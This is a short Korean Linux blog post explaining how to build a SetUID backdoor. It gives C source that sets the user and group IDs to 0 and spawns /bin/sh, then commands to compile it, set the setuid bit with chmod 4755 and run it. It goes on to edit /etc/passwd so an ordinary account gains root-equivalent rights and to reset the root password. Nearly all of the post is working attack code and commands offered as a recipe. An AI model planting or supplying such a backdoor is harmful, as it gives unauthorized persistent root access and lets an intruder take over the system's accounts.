Analysis/Linux

SetUID를 이용한 백도어 제작

vencedor 2016. 6. 21. 17:28

#vi backdoor.c  //파일제작

#include<stdio.h>
main(){
     setuid(0);
     setgid(0);
     system("/bin/sh");

}

#gcc -o backdoor backdoor.c //컴파일

#chmod 4755 backdoor //일반권한 설정


#./backdoor //실행


#vi /etc/passwd  //일반사용자 id로 접근이 가능해진다.
                      //자신의 일반사용자 id를 찾아 관리자 권한과 동일한 권한을 갖도록 수정

#passwd root